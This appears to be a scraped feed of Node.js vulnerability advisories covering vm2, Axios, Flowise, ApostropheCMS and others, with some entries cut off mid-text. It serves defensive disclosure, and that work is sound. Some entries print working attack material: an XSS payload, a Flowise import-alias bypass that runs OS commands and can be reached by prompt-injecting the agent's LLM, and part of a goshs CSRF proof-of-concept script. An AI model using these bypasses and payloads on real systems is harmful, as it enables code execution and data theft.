Node.js

Remote code execution in vm2 (Node.js sandbox library) versions prior to 3.11.0 allows unauthenticated network attackers to escape the sandbox and execute arbitrary code on the host system. The SuppressedError vulnerability (GHSA-55hx-c926-fr95) is one of 13 full sandbox-escape primitives patched in this coordinated security release. CVSS 9.8 Critical reflects network-accessible, unauthenticated exploitation with no complexity barriers. No CISA KEV listing or public POC data at time of analysis, but vendor explicitly warns 'embedders running untrusted code should upgrade,' indicating active risk to production deployments using vm2 for sandboxing untrusted JavaScript execution.

Remote code execution in vm2 (Node.js sandbox library) versions prior to 3.11.0 allows unauthenticated attackers to escape the sandbox environment via the inspect function and execute arbitrary system commands. The vulnerability exploits handler leakage through util.inspect's showProxy option to reconstruct host-realm objects and break isolation guarantees. CRITICAL: This is a complete sandbox bypass affecting all deployments using vm2 for untrusted code execution. Vendor-released patch available in version 3.11.0 with multiple commits addressing eight distinct exploitation primitives discovered during iterative disclosure.

Sandbox escape in vm2 for Node.js allows remote unauthenticated attackers to execute arbitrary commands on the host system. The vulnerability represents an insufficient fix for CVE-2023-37466, enabling attackers to circumvent sandbox protections through multiple attack vectors including Function constructor extraction, proxy unwrapping, property descriptor manipulation, and WebAssembly JSTag exploitation. CVSS 9.8 (Critical) with EPSS data unavailable, but the existence of a detailed security advisory and comprehensive patch from GitHub indicates active vendor awareness and rapid response. Patched in version 3.10.5 with eleven distinct fixes addressing various bypass techniques.

Malicious code injection in Bitwarden CLI 2026.4.0 distributed via npm for 90 minutes on April 22, 2026, enables remote command execution without authentication. The compromise was part of a broader Checkmarx supply chain attack targeting the npm registry. Users who installed this specific version during the 21:57Z-23:30Z window received a backdoored package capable of executing arbitrary OS commands. EPSS data not available for this recent CVE, but the supply chain vector and brief exposure window suggest targeted rather than mass exploitation.

Authorization bypass in Clerk JavaScript SDKs allows authenticated users to proceed past combined authorization checks they should fail. When developers use has() or auth.protect() with multiple authorization dimensions (e.g., role + reverification, permission + billing feature, or billing plan + permission), the predicate incorrectly returns true for users who satisfy only a subset of the required conditions. Sessions and authentication remain secure, but gated actions may execute for under-privileged users. Patches released across all affected SDK packages (Core 2 and Core 3) with no API changes. No public exploit code identified at time of analysis, but the vulnerability is straightforward to trigger in production code patterns explicitly outlined in the vendor advisory.

Server-Side Request Forgery (SSRF) in n8n-mcp SDK allows authenticated remote attackers to access cloud metadata endpoints and internal network resources via IPv4-mapped IPv6 address bypass. Versions 2.47.4 through 2.47.13 fail to validate IPv6 addresses in the synchronous URL validator (SSRFProtection.validateUrlSync()), enabling attackers who control the n8nApiUrl parameter to bypass RFC1918, localhost, and cloud metadata protections using addresses like [::ffff:169.254.169.254]. The vulnerability is non-blind SSRF returning response bodies to the attacker, and forwards the n8nApiKey in the x-n8n-api-key header to attacker-controlled targets. Confirmed actively exploited (CISA KEV). Vendor-released patch: version 2.47.14. EPSS exploitation probability not provided but risk is elevated given KEV status and availability of exploit code in the GitHub advisory.

The `BetaLocalFilesystemMemoryTool` in the Anthropic TypeScript SDK created memory files and directories using the Node.js default modes (`0o666` for files, `0o777` for directories), leaving them world-readable on systems with a standard umask and world-writable in environments with a permissive umask such as many Docker base images. A local attacker on a shared host could read persisted agent state, and in containerized deployments could modify memory files to influence subsequent model behavior. Users on the affected versions are advised to update to the latest version. Claude SDK thanks `lucasfutures` for the report.

Uncontrolled recursion in Apache Thrift Node.js library's skip() function enables remote denial of service via crafted protocol messages. Attacker sends specially-crafted Thrift messages triggering deep recursion in the skip() deserialization routine, exhausting stack memory and crashing the Node.js process. CVSS 8.7 High severity with network attack vector requiring no authentication. Disclosed via oss-security mailing list on 2026-04-28 alongside three related Thrift vulnerabilities (C++ JSON OOB read CVE-2026-41607, c_glib dispatch stack overflow CVE-2026-41606, Swift Compact Protocol issue CVE-2026-41605), suggesting coordinated security audit results. EPSS data not yet available for 2026 CVE.

Integer overflow in Apache Thrift Swift Compact Protocol implementation versions prior to 0.23.0 enables remote unauthenticated attackers to achieve partial confidentiality, integrity, and availability impact. This is one of six related vulnerabilities disclosed simultaneously affecting multiple Apache Thrift language implementations (Swift, Node.js, C++, c_glib, Go). EPSS score of 0.02% (5th percentile) indicates low current exploitation probability, with no active exploitation confirmed by CISA KEV at time of analysis. Vendor-released patch version 0.23.0 addresses this and related Thrift implementation flaws.

Out-of-bounds read in Apache Thrift C++ JSON deserialization allows remote attackers to leak sensitive information and trigger denial of service via malformed JSON payloads. Affects Apache Thrift versions prior to 0.23.0. The vulnerability has low exploitation probability (EPSS 0.02%) and is not currently listed in CISA KEV, suggesting limited real-world weaponization despite network-accessible attack vector.

Stack overflow in Apache Thrift c_glib dispatch mechanism allows remote attackers to trigger denial of service via crafted network requests. The vulnerability affects Apache Thrift versions prior to 0.23.0 and requires no authentication or user interaction, resulting in application crashes or service unavailability. Patch is available from the vendor.

Improper use of the static-eval npm package in the open source solution qnabot-on-aws versions 7.2.4 and earlier may allow an authenticated administrator to execute arbitrary code within the fulfillment Lambda execution context by injecting a crafted conditional chaining expression via the Content Designer interface, which bypasses the intended expression sandbox through JavaScript prototype manipulation. This may grant direct access to backend resources (Lambda environment variables, OpenSearch indices, S3 objects, DynamoDB tables) that are not exposed through normal administrative interfaces. We recommend you upgrade to version 7.3.0 or above.

Remote code execution in electerm's npm install script allows unauthenticated attackers to execute arbitrary system commands on Linux systems during package installation. The install.js script unsafely concatenates attacker-controlled version strings from the project's update server directly into an 'rm -rf' command, enabling command injection. This critically affects users installing electerm via 'npm install -g electerm' on Linux, as a compromised update server or man-in-the-middle attacker could inject malicious commands during the installation process. The vulnerability has been patched in commit 59708b38c8, and the fixed version is already published to npm.

Axios HTTP client versions prior to 1.15.1 and 0.31.1 use loose truthy/falsy comparison instead of strict boolean checks for the withXSRFToken config property, allowing XSRF tokens to be sent to cross-origin servers when the property is set to any truthy non-boolean value through prototype pollution or misconfiguration. This bypasses same-origin validation and enables attackers to exfiltrate XSRF tokens to attacker-controlled domains, compromising CSRF protection across applications using vulnerable versions.

Denial of service in Axios HTTP client before versions 1.15.1 and 0.31.1 allows remote unauthenticated attackers to crash Node.js processes by sending requests with deeply nested object structures that trigger unbounded recursion in the toFormData function. The vulnerability affects both browser and Node.js environments but is exploitable in server-side Node.js deployments where attacker-controlled data is passed to toFormData without depth validation.

Axios HTTP client prior to version 1.15.1 (1.x branch) and 0.31.1 (0.x branch) fails to enforce maxContentLength limits when responseType is set to 'stream', allowing attackers to cause denial of service by streaming unbounded response payloads that bypass configured size restrictions. The vulnerability affects both browser and Node.js environments and requires no authentication or user interaction to exploit.

Axios versions prior to 1.15.1 and 0.31.1 allow remote attackers to bypass maxBodyLength restrictions on stream request bodies when maxRedirects is set to 0, enabling denial of service through oversized uploads that consume unbounded server resources. The vulnerability affects the native http/https transport path in Node.js environments and enables attackers to send streamed payloads that exceed configured size limits, potentially exhausting memory or bandwidth on the target application.

Axios HTTP client versions 1.0.0 through 1.15.0 allow header injection in multipart form-data bodies through unsanitized CRLF sequences in the Content-Type header of individual parts. An attacker controlling a Blob/File object's .type property (such as via user-uploaded files in a Node.js proxy service) can inject arbitrary MIME headers into the multipart body, bypassing Node.js v18+ built-in header protections. The vulnerability affects network-accessible services and results in integrity compromise through header manipulation.

Axios versions prior to 1.15.1 and 0.31.1 fail to properly bypass proxy configurations when no_proxy=localhost is set, allowing attackers to route requests to loopback addresses (127.0.0.1 and [::1]) through proxy servers instead of bypassing them. This Server-Side Request Forgery (SSRF) vulnerability arises because the shouldBypassProxy() function performs only string matching without resolving IP aliases or loopback equivalents, potentially exposing internal services to proxy interception or manipulation with a CVSS score of 6.8 (high confidentiality impact over changed scope).

Prototype pollution in Axios library versions prior to 1.15.1 and 0.31.1 allows remote attackers to suppress HTTP error responses via pollution of Object.prototype.validateStatus, causing authentication failures and server errors to be silently treated as successful responses. The vulnerability requires high attack complexity (prototype pollution gadget chain) but enables complete bypass of application-level authentication and error handling without user interaction.

HTTP request smuggling in Axios HTTP client library allows remote attackers to bypass NO_PROXY protection and route requests through 127.0.0.0/8 addresses other than 127.0.0.1. Attackers who control target URLs in applications using Axios prior to versions 1.15.1 and 0.31.1 can bypass proxy restrictions and potentially access internal resources with changed scope (CVSS S:C). This is an incomplete fix regression of CVE-2025-62718, indicating the original patch failed to cover the full 127.0.0.0/8 loopback range. No public exploit identified at time of analysis, EPSS data not provided.

Prototype pollution in Axios JSON parsing allows attackers to manipulate JSON API responses through Object.prototype pollution in the dependency tree, enabling privilege escalation, balance manipulation, and authorization bypass on applications using affected versions 1.0.0 through 1.15.1. The vulnerability exploits the parseReviver callback parameter in the default transformResponse function, which processes every key-value pair in JSON responses without validation, permitting surgical modification of individual response values while remaining invisible to the application logic.

Axios versions prior to 1.15.1 and 0.31.1 contain a character mapping flaw in the AxiosURLSearchParams.encode() function that reverses safe percent-encoding of null bytes, converting %00 back to raw null bytes. While the standard axios request flow remains unaffected, this vulnerability could enable integrity compromise in edge-case scenarios where encoded parameters are processed by downstream systems expecting percent-encoded values. No public exploit code or active exploitation has been identified.

Prototype pollution in Axios 1.x (prior to 1.15.1) and 0.x (prior to 0.31.1) enables HTTP header injection attacks when any dependency in the application pollutes Object.prototype with specific properties (getHeaders, append, pipe, on, once, Symbol.toStringTag). Attackers exploit the HTTP adapter's duck-type checking to inject arbitrary headers into outbound HTTP requests, potentially leading to authentication bypass, session hijacking, or cache poisoning. EPSS data unavailable; no confirmed active exploitation (CISA KEV) at time of analysis. Publicly available exploit code exists per vendor advisory GHSA-6chq-wfr3-2hj9.

Prototype pollution in Axios HTTP client versions before 1.15.1 and 0.31.1 enables silent interception and modification of all JSON responses or complete HTTP transport hijacking when the JavaScript Object.prototype has been polluted by a co-dependency. This vulnerability requires a separate prototype pollution source within the same Node.js process but requires no authentication once that precondition exists. An attacker can then access credentials, headers, and request bodies across the application. EPSS data not available; no public exploit identified at time of analysis.

Unauthenticated remote attackers can crash Node.js applications using marked versions 18.0.0-18.0.1 by sending a specially crafted 3-byte sequence (tab, vertical tab, newline). The infinite recursion loop exhausts memory and triggers an out-of-memory crash, enabling complete denial of service against any exposed markdown parsing endpoint. Vendor-released patch fixes the vulnerability in version 18.0.2. No public exploit identified at time of analysis, though the attack input is trivially simple and reproducible. CVSS v4.0 8.7 reflects high availability impact with network reachability and no authentication barriers.

{% layout %}` / `{% block %}` tags. Vendor patch available via GitHub commit e2311df. CVSS 7.5 (High) reflects network-accessible, low-complexity attack requiring no privileges or user interaction, causing complete availability loss.

Denial of service in basic-ftp for Node.js allows remote malicious FTP servers to crash client applications via unbounded memory consumption during directory listing operations. Attackers controlling or compromising an FTP server can send infinite or extremely large listing responses to Client.list() calls, exhausting client memory until process termination. Unauthenticated network attack with low complexity (CVSS:3.1 AV:N/AC:L/PR:N). No public exploit identified at time of analysis, though attack concept is straightforward for anyone operating a malicious FTP server.

{ redirect: 'manual' }`. This is an incomplete fix for GHSA-qpr4-c339-7vq8. Confirmed on HEAD. `image-binding-transform.ts` line 28: const content = await (isRemotePath(href) ? fetch(imageSrc) : assets.fetch(imageSrc)); Missing `{ redirect: 'manual' }`. The three protected paths: // image-passthrough-endpoint.ts:23 response = await fetch(href, { redirect: 'manual' }); // assets/endpoint/shared.ts:11 const res = await fetch(src, { redirect: 'manual' }); // assets/utils/remoteProbe.ts:53 const response = await fetch(url, { redirect: 'manual' }); Demonstrated with Node.js that `fetch()` without `redirect: 'manual'` follows 302 redirects to arbitrary destinations: fetch('http://allowed:19741/img.jpg') → follows 302 → hits http://internal:19742/secret fetch('http://allowed:19741/img.jpg', {redirect:'manual'}) → returns 302, internal server NOT hit Attack path: attacker finds an open redirect on an allowed domain, crafts `/_image?href=https://allowed-cdn.com/redirect?url=http://internal-service/`, and the Worker follows the redirect to the unauthorized destination. Bypasses the `image.domains` and `image.remotePatterns` allowlist for the default Cloudflare image service (`cloudflare-binding`). Enables blind SSRF to domains not in the allowlist. Same vulnerability class as GHSA-qpr4-c339-7vq8 (HIGH) which fixed the passthrough endpoint but missed this one. const content = await (isRemotePath(href) ? fetch(imageSrc, { redirect: 'manual' }) : assets.fetch(imageSrc));

Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Server-Side Request Forgery (SSRF) protection bypass vulnerability exists in the Custom Function feature. While the application implements SSRF protection via HTTP_DENY_LIST for axios and node-fetch libraries, the built-in Node.js http, https, and net modules are allowed in the NodeVM sandbox without equivalent protection. This allows authenticated users to bypass SSRF controls and access internal network resources (e.g., cloud provider metadata services) This vulnerability is fixed in 3.1.0.

Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). This vulnerability is fixed in 3.1.0.

@node-oauth/oauth2-server is a module for implementing an OAuth2 server in Node.js. The token exchange path accepts RFC7636-invalid code_verifier values (including one-character strings) for S256 PKCE flows. Because short/weak verifiers are accepted and failed verifier attempts do not consume the authorization code, an attacker who intercepts an authorization code can brute-force code_verifier guesses online until token issuance succeeds.

n8n-mcp v2.47.10 and earlier in HTTP transport mode logs sensitive authentication credentials and request metadata regardless of authentication outcome, allowing disclosure of bearer tokens, API keys, and JSON-RPC payloads to any system with access to server logs. While access control correctly rejects unauthenticated requests with 401 responses, the sensitive data from those rejected requests is persisted in logs before authentication is enforced, creating an information disclosure vulnerability (CWE-532) with CVSS 5.3 (low confidentiality impact). No public exploit code or active exploitation is documented; patch is available in v2.47.11.

Remote unauthenticated attackers achieve full code execution on Paperclip AI orchestration servers (versions prior to 2026.416.0) via authentication bypass through a six-step API call chain. The attack requires no credentials, no user interaction, and succeeds against default 'authenticated' mode deployments exposed to network access. CVSS 10.0 with scope change indicates container/host escape potential. No active exploitation confirmed in CISA KEV at time of analysis, though the vendor advisory (GitHub Security Advisory GHSA-68qg-g8mg-6pr7) confirms the critical authentication bypass mechanism in both @paperclipai/server and paperclip npm packages.

Command injection in Paperclip @paperclipai/server (versions <2026.416.0) allows authenticated agents to execute arbitrary OS commands on the server host. Attackers with Agent API credentials can escalate from agent runtime to full server host control by injecting malicious shell commands through the adapterConfig.workspaceStrategy.provisionCommand field during workspace provisioning. CVSS 8.8 (high) with network-accessible attack vector and low complexity. Vendor patch available in version 2026.416.0. No public exploit or CISA KEV listing identified at time of analysis, but the vulnerability breaks critical trust boundaries in multi-agent AI orchestration systems.

HTTP response splitting and denial-of-service in i18next-http-middleware < 3.9.3 allows remote unauthenticated attackers to inject arbitrary HTTP headers or crash Node.js processes via CRLF sequences in the lng parameter. On Node.js < 14.6.0, attackers achieve response splitting enabling session fixation, cache poisoning, and reflected XSS. On Node.js ≥ 14.6.0, malformed headers trigger unhandled ERR_INVALID_CHAR exceptions, returning 500 errors to all concurrent users sharing the affected process. Vendor-released patch available in version 3.9.3. No public exploit identified at time of analysis, though exploitation is trivial given the attack vector (simple query parameter manipulation).

Denial of service in @xmldom/xmldom Node.js XML library allows remote attackers to crash applications via deeply nested XML documents. Seven DOM traversal methods (normalize, serializeToString, getElementsByTagName, cloneNode, importNode, textContent getter, isEqualNode) implement unbounded recursion consuming call stack frames until RangeError exception terminates the process. Exploitation requires no authentication - attackers send a single valid XML payload nested ~5,000-10,000 levels deep to trigger stack exhaustion in any subsequent DOM operation. Browser implementations of identical DOM methods use iterative C++ code and are unaffected. CVSS 8.7 High severity reflects network attack vector with no complexity barriers. Vendor-released patches (0.8.13, 0.9.10) replace all recursive traversals with iterative 'walkDOM' utility consuming heap instead of stack. Legacy unscoped 'xmldom' package (≤0.6.0) remains unfixed.

fast-xml-parser XMLBuilder fails to escape comment and CDATA delimiters when building XML from JavaScript objects, allowing XML injection via unescaped `-->` and `]]>` sequences in user-controlled content. Attackers can inject malicious XML elements into comments or CDATA sections, enabling XSS attacks in browser contexts, SOAP message manipulation, RSS feed poisoning, or XML structure breakage. The vulnerability requires user interaction (UI:R) and affects only XMLBuilder output that includes user-controlled comments or CDATA; no public exploit code identified at time of analysis.

Cross-site scripting (XSS) in DOMPurify occurs when function-based ADD_TAGS configuration is used with FORBID_TAGS, allowing attackers to bypass tag filtering and inject dangerous elements such as iframe, form, object, and embed with their attributes intact. The vulnerability stems from inconsistent handling of FORBID_TAGS compared to the separately-fixed FORBID_ATTR logic, where the forbidden tag check is short-circuited by a function-based ADD_TAGS predicate. Publicly available proof-of-concept demonstrates iframe and form injection with external URLs surviving sanitization; patch is available in version 3.4.0.

Cross-site scripting (XSS) in DOMPurify when using SAFE_FOR_TEMPLATES with RETURN_DOM or RETURN_DOM_FRAGMENT modes allows remote attackers to execute arbitrary JavaScript by crafting malformed HTML that reassembles into template expressions after DOM normalization. The vulnerability affects DOMPurify from v1.0.10 through at least v3.3.3, exploitable when sanitized output is mounted into template-evaluating frameworks like Vue 2. A proof-of-concept demonstrates reliable exploitation with alert(1) execution.

Path traversal in DDEV versions prior to 1.25.2 allows remote attackers to write files outside intended extraction directories when downloading and extracting archives from remote sources. The vulnerability affects the Untar() and Unzip() functions in pkg/archive/archive.go, which lack path validation during extraction. Exploitation requires user interaction (UI:R) to trigger archive extraction but can achieve high integrity impact through arbitrary file write. A proof-of-concept exists, and CISA SSVC framework rates this as exploitable with partial technical impact.

{dict} I will ask question, and you will output the Python code using pandas dataframe to answer my question. Do not provide any explanations. Do not respond with anything except the output of the code. Security: Output ONLY pandas/numpy operations on the dataframe (df). Do not use import, exec, eval, open, os, subprocess, or any other system or file operations. The code will be validated and rejected if it contains such constructs. Question: {question} Output Code: ``` Where `{dict}` is the extracted column names and `{question}` is the initial prompt provided by the user. This system prompt is sent to an LLM in order for it to generate a Python script based on the user's prompt, and the LLM-generated response is stored in a variable named `pythonCode`. The method then evaluates the `pythonCode` variable in a pyodide environment. While the LLM-generated Python script is evaluated in a non-sandboxed environment, there is a list of forbidden patterns that are checked before the script is executed on the server. The function `validatePythonCodeForDataFrame()` enumerates through a list named `FORBIDDEN_PATTERNS`, which contains pairs of regex patterns and reasons. Each regex pattern is run against the Python script, and if the pattern is found in the script, the script is invalidated and is not run, responding to the request with a reason for rejection. The input validation can be bypassed, which can still lead to running arbitrary OS commands on the server. An example of this is the pattern `/\bimport\s+(?!pandas|numpy\b)/g`, which intends to search for lines of code that import a module other than pandas or numpy. This can be bypassed by importing along with pandas or numpy. For example, consider the following lines of code: ```python import pandas as np, os as pandas pandas.system("xcalc") ``` Here, pandas is imported, but so is the `os` module, with `pandas` as its alias. OS commands can then be invoked with `pandas.system()`. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the CSV Agent node may convince an LLM to respond with a malicious Python script that executes attacker-controlled commands on the Flowise server. It is also possible for an authenticated attacker to exploit this vulnerability by specifying an attacker-controlled server in a chatflow. This server would respond to prompts with an attacker-controlled Python script instead of an LLM-generated response, which would then be evaluated on the server. ```ts import type { PyodideInterface } from 'pyodide' import * as path from 'path' import { getUserHome } from '../../../src/utils' let pyodideInstance: PyodideInterface | undefined export async function LoadPyodide(): Promise<PyodideInterface> { if (pyodideInstance === undefined) { const { loadPyodide } = await import('pyodide') const obj: any = { packageCacheDir: path.join(getUserHome(), '.flowise', 'pyodideCacheDir') } pyodideInstance = await loadPyodide(obj) await pyodideInstance.loadPackage(['pandas', 'numpy']) } return pyodideInstance } export const systemPrompt = `You are working with a pandas dataframe in Python. The name of the dataframe is df. The columns and data types of a dataframe are given below as a Python`*

Remote attackers can crash Nest.js applications (versions prior to 11.1.19) by sending approximately 47 KB of fragmented JSON messages within a single TCP frame, triggering a call stack overflow. The handleData() function's recursive processing of small valid JSON messages causes stack exhaustion before maxBufferSize limits are enforced, resulting in RangeError and denial of service. No authentication required (CVSS AV:N/PR:N). Vendor patch released in version 11.1.19. EPSS data not available; no confirmed active exploitation (not in CISA KEV).

Denial of service in Next AI Draw.io prior to version 0.4.15 allows local attackers to crash the embedded HTTP sidecar by sending oversized request bodies to three POST endpoints (/api/state, /api/restore, /api/history-svg) without size limits, exhausting Node.js V8 heap memory and forcing an out-of-memory shutdown. CVSS 6.2 reflects local attack vector and high availability impact; no public exploit code confirmed at time of analysis.

Signal K Server versions before 2.25.0 allow remote unauthenticated attackers to crash the server via Regular Expression Denial of Service (ReDoS) in WebSocket subscription handling. By injecting unescaped regex metacharacters into the context parameter, attackers trigger catastrophic backtracking that consumes 100% CPU and renders the server completely unresponsive to all API and socket requests. This creates a complete denial of service for marine navigation systems relying on Signal K Server as their central data hub. While EPSS score is low (0.04%, 13th percentile), the trivial exploitation complexity (AV:N/AC:L/PR:N/UI:N) and complete availability impact make this a priority for boat operators running vulnerable versions. No public exploit identified at time of analysis, but the GitHub security advisory provides clear technical details. Vendor-released patch available in version 2.25.0.

Symlink-based path traversal in the npm package 'compressing' v2.1.0 enables arbitrary file overwrites outside intended extraction directories via pre-planted symbolic links delivered through Git repositories. Attackers exploit a partial fix bypass of CVE-2026-24884 by poisoning filesystem state before archive extraction-Git clone operations automatically deploy malicious symlinks without user interaction beyond standard developer workflows. This supply chain vector allows overwriting critical system files (e.g., /etc/passwd) or application binaries to achieve privilege escalation or remote code execution. CVSS 8.4 (AV:L) reflects local attack vector, but real-world risk is amplified by Git-based delivery requiring zero privileges and no user interaction beyond cloning a malicious repository. No EPSS or KEV data available at time of analysis.

{ return new Promise((resolve, reject) => { let body = ''; req.on('data', (chunk) => { body += chunk.toString(); // No size limit }); req.on('end', () => { try { const parsed = body ? JSON.parse(body) : null; resolve(parsed); } catch (error) { reject(error); } }); req.on('error', reject); }); } ``` A `maxMessageSize` configuration value exists in `DEFAULT_HTTP_STREAM_CONFIG` (4MB, defined in `src/transports/http/types.ts` line 124) but is never enforced in `readRequestBody()`. This creates a false sense of security. Local testing with 50MB POST payloads against the vulnerable `readRequestBody()` function: | Trial | Payload | RSS growth | Time | Result | |-------|---------|-----------|------|--------| | 1 | 50MB | +197MB | 42ms | Vulnerable | | 2 | 50MB | +183MB | 46ms | Vulnerable | | 3 | 50MB | +15MB | 43ms | Vulnerable | | 4 | 50MB | +14MB | 32ms | Vulnerable | | 5 | 50MB | +65MB | 38ms | Vulnerable | Reproducibility: 5/5 (100%) - **Denial of Service:** Any mcp-framework HTTP server can be crashed by a single large POST request to /mcp - **No authentication required:** readRequestBody() executes before any auth checks (auth is opt-in, default is no auth) - **Dead config:** maxMessageSize exists but is never enforced, giving a false sense of security - **Affected:** All applications using mcp-framework HttpStreamTransport (60,000 weekly npm downloads) **CWE-770:** Allocation of Resources Without Limits or Throttling **Suggested CVSS 3.1:** 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) Enforce `maxMessageSize` in `readRequestBody()`: ```typescript private async readRequestBody(req: IncomingMessage): Promise<any> { const maxSize = this._config.maxMessageSize || 4 * 1024 * 1024; return new Promise((resolve, reject) => { let body = ''; let size = 0; req.on('data', (chunk) => { size += chunk.length; if (size > maxSize) { req.destroy(); reject(new Error('Request body too large')); return; } body += chunk.toString(); }); // ... }); } ``` This report follows coordinated disclosure. I request a 90-day window before public disclosure. **Reporter:** Raza Sharif, CyberSecAI Ltd (contact@agentsign.dev)

@fastify/static versions 8.0.0 through 9.1.0 allow path traversal when directory listing is enabled via the list option. The dirList.path() function resolves directories outside the configured static root using path.join() without a containment check. A remote unauthenticated attacker can obtain directory listings for arbitrary directories accessible to the Node.js process, disclosing directory and file names. File contents are not disclosed. Upgrade to @fastify/static 9.1.1 to fix this issue. As a workaround, disable directory listing by removing the list option from the plugin configuration.

ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain an authorization bypass vulnerability in the choices and counts query parameters of the REST API, where these query builders execute MongoDB distinct() operations that bypass the publicApiProjection restrictions intended to limit which fields are exposed publicly. The choices and counts parameters are processed via applyBuildersSafely before the projection is applied, and MongoDB's distinct operation does not respect projections, returning all distinct values directly. The results are returned in the API response without any filtering against publicApiProjection or removeForbiddenFields. An unauthenticated attacker can extract all distinct field values for any schema field type that has a registered query builder, including string, integer, float, select, boolean, date, slug, and relationship fields. Fields protected with viewPermission are similarly exposed, and the counts variant additionally reveals how many documents have each distinct value. Both the piece-type and page REST APIs are affected. This issue has been fixed in version 4.29.0.

ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a stored cross-site scripting vulnerability in SEO-related fields (SEO Title and Meta Description), where user-controlled input is rendered without proper output encoding into HTML contexts including <title> tags, <meta> attributes, and JSON-LD structured data. An attacker can inject a payload such as "></title><script>alert(1)</script> to break out of the intended HTML context and execute arbitrary JavaScript in the browser of any authenticated user who views the affected page. This can be leveraged to perform authenticated API requests, access sensitive data such as usernames, email addresses, and roles via internal APIs, and exfiltrate it to an attacker-controlled server. This issue has been fixed in version 4.29.0.

ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a stored cross-site scripting vulnerability in the @apostrophecms/color-field module, where color values prefixed with -- bypass TinyColor validation intended for CSS custom properties, and the launder.string() call performs only type coercion without stripping HTML metacharacters. These unsanitized values are then concatenated directly into <style> tags both in per-widget style elements rendered for all visitors and in the global stylesheet rendered for editors, with the output marked as safe HTML. An editor can inject a value which closes the style tag and executes arbitrary JavaScript in the browser of every visitor to any page containing the affected widget. This enables mass session hijacking, cookie theft, and privilege escalation to administrative control if an admin views draft content. This issue has been fixed in version 4.29.0.

ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain an authorization bypass vulnerability in the getRestQuery method of the @apostrophecms/piece-type module, where the method checks whether a MongoDB projection has already been set before applying the admin-configured publicApiProjection. An unauthenticated attacker can supply a project query parameter in the REST API request, which is processed by applyBuildersSafely before the permission check, pre-populating the projection state and causing the publicApiProjection to be skipped entirely. This allows disclosure of any field on publicly queryable documents that the administrator explicitly restricted from the public API, such as internal notes, draft content, or metadata. Exploitation is trivial, requiring only appending query parameters to a public URL with no authentication. This issue has been fixed in version 4.29.0.

Cross-site scripting (XSS) in ApostropheCMS 4.28.0 and sanitize-html 2.17.1 allows remote attackers to bypass HTML tag filtering and inject arbitrary tags through entity-encoded payloads in textarea and option elements. A regression in the sanitize-html parser incorrectly assumes htmlparser2 does not decode entities within non-text elements, causing encoded HTML to be decoded and written directly to output without sanitization. Exploitation requires non-default configurations where textarea or option tags are in the allowedTags list, commonly found in form builders, and user interaction to submit form content. No active exploitation has been identified at time of analysis, but the vulnerability is trivial to exploit once configuration conditions are met.

ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a timing side-channel vulnerability in the password reset endpoint (/api/v1/@apostrophecms/login/reset-request) that allows unauthenticated username and email enumeration. When a user is not found, the handler returns after a fixed 2-second artificial delay, but when a valid user is found, it performs a MongoDB update and SMTP email send with no equivalent delay normalization, producing measurably different response times. The endpoint also accepts both username and email via an $or query, and has no rate limiting as the existing checkLoginAttempts throttle only applies to the login flow. This enables automated enumeration of valid accounts for use in credential stuffing or targeted phishing. Only instances that have explicitly enabled the passwordReset option are affected, as it defaults to false. This issue has been fixed in version 4.29.0.

Upsonic 0.71.6 contains a remote code execution vulnerability in its MCP server/task creation functionality. The application allows users to define MCP tasks with arbitrary command and args values. Although an allowlist exists, certain allowed commands (npm, npx) accept argument flags that enable execution of arbitrary OS commands. Maliciously crafted MCP tasks may lead to remote code execution with the privileges of the Upsonic process. In version 0.72.0 Upsonic added a warning about using Stdio servers being able to execute commands directly on the machine.

{ if [[ -n "${ATTACKER_PID:-}" ]]; then kill "${ATTACKER_PID}" >/dev/null 2>&1 || true fi if [[ -n "${GOSHS_PID:-}" ]]; then kill "${GOSHS_PID}" >/dev/null 2>&1 || true fi } trap cleanup EXIT mkdir -p "$ROOT" "$SITE" printf 'delete me\n' > "$ROOT/victim.txt" cat > "$SITE/delete.html" <<HTML <!doctype html> <html> <body> <img src="http://127.0.0.1:${PORT}/victim.txt?delete"> </body> </html> HTML cat > "$SITE/mkdir.html" <<HTML <!doctype html> <html> <body> <img src="http://127.0.0.1:${PORT}/csrfmade?mkdir"> </body> </html> HTML echo "[1/6] Building goshs beta.5" (cd "$REPO" && go build -o "$BIN" ./) echo "[2/6] Starting goshs with HTTP basic auth" "$BIN" -d "$ROOT" -p "$PORT" -b 'u:p' >"$WORKDIR/goshs.log" 2>&1 & GOSHS_PID=$! for _ in $(seq 1 40); do if curl -s -u u:p "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then break fi sleep 0.25 done echo "[3/6] Serving attacker pages" python3 -m http.server "$ATTACKER_PORT" --directory "$SITE" >"$WORKDIR/attacker.log" 2>&1 & ATTACKER_PID=$! if [[ ! -d "$PLAY_DIR/node_modules/playwright-core" ]]; then mkdir -p "$PLAY_DIR" (cd "$PLAY_DIR" && npm install --no-save playwright-core >/dev/null) fi if [[ ! -x "$CHROME" ]]; then echo "[ERROR] Chrome not found at $CHROME" >&2 exit 1 fi echo "[4/6] Visiting attacker pages from an authenticated browser" node - <<'NODE' const { chromium } = require('/tmp/codex-playwright/node_modules/playwright-core'); (async () => { const browser = await chromium.launch({ headless: true, executablePath: '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome', }); const context = await browser.newContext({ httpCredentials: { username: 'u', password: 'p' }, }); const page = await context.newPage(); await page.goto('http://127.0.0.1:18095/', { waitUntil: 'domcontentloaded' }); await page.goto('http://127.0.0.1:18889/delete.html', { waitUntil: 'domcontentloaded' }); await page.waitForTimeout(1200); await page.goto('http://127.0.0.1:18889/mkdir.html', { waitUntil: 'domcontentloaded' }); await page.waitForTimeout(1200); await browser.close(); })(); NODE echo "[5/6] Verifying impact" DELETE_STATUS="MISSING" MKDIR_STATUS="MISSING" if [[ ! -e "$ROOT/victim.txt" ]]; then DELETE_STATUS="DELETED" fi if [[ -d 